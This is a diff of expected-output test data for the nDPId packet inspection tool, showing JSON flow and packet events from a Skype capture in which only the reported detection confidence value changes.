00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VkAAEAR8c7AqAEinTc4jzLdnFIAIGspe5MC1RnFiDDpE1Hd7iM493fNRlWzMToF"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1431970674018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970674018,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxdyEUu77fnywjBZqASOJAmdQAAAgQFrAQCCApO3xkOPjIfpgEDAwk="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1431970674018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970674018,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ax5AAEAGhGTAqAEi1cezr8hFnF3LCMFmLu+36IAQECx9awAAAQEICj4yH9pO3xkO"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/ed8AAEARbbrAqAEinTg0EjLdgQkAK+56e5UCujNYWaHOaIv8Mbnq8Yy9ltzxTGOAleIkOtVygbgwGI4="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/QPIAAEARV4\/AqAEiQTffKzLdnEYAK9tXe5cCDvOGtur9CosePaKDkKEzL5ekZUj+DrgiIjruAPBzlGM="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2DYgAAEAR1ZfAqAEinTc4ljLdnE4AIk81e5kCIa6rFGHkjW7tTxYGLEfEQXIXcRjIprw="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675578,"flow_last_seen":1431970675578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675578,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431970675578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675578,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVJFAAEAGmuXAqAEi1cezr8hHAbtzmW86AAAAALAC\/\/\/ayQAAAgQFtAEDAwUBAQgKPjIl6QAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1431970675640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970675640,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7yEfSVR1Cc5lvO6ASOJBaGQAAAgQFrAQCCApO3xqhPjIl6QEDAwk="} @@ -649,75 +649,75 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABAxtRAAEAGKUnAqAEinTfrmMhInF05JqawAAAAALAC\/\/9CLwAAAgQFtAEDAwUBAQgKPjInhAAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABB4XAAAEARAafAqAEinTc4kzLdnE4ALQw6e5sCLpawwxGRzNJ9jeoeh5bY+9RpiszLnAcSdcNuRnMOI9PLQQ=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1ktIAAEARBdLAqAEiQTffEjLdnFkAIdOte50CPL9ZRieP6CLGvHSnuteGzwQxXE6Sug=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1431970676061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970676061,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIpxdyEgRBN2QOSamsaASOJC3pAAAAgQFrAQCCApMXif\/PjInhAEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1431970676061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970676061,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FvZAAEAG2TPAqAEinTfrmMhInF05JqaxEQTdkYAQECwOiwAAAQEICj4yJ8hMXif\/"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2RjwAAEAR6djAqAEinTfroDLdnFYAIpfGe58CtglNf35c9xed\/TOYZPtdg4AQKYWmKBE="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5iSIAAEARWf7AqAEinTc4kjLdnF4AJWUse6ECi+HEJAzVpo3ery\/yzADPEQnmy2088qUgojE="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677603,"flow_last_seen":1431970677603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970677603,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431970677603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970677603,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVVtAAEAGmsLAqAEinTfrmMhKAbuh9dLFAAAAALAC\/\/9BpgAAAgQFtAEDAwUBAQgKPjItyQAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1431970677668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970677668,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIgG7yErORgmHofXSxqASOJDMTwAAAgQFrAQCCApMXimSPjItyQEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1431970677668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970677668,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tRpAAEAGOw\/AqAEinTfrmMhKAbuh9dLGzkYJiIAQECwjOgAAAQEICj4yLglMXimS"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+xqAAAEAR0mLAqAEinTeCqjLdnFIAKv3he6MC3h4IlBBBiQEMzD2u81WGXlCVYngNZSbA0YydRzOnaw=="} 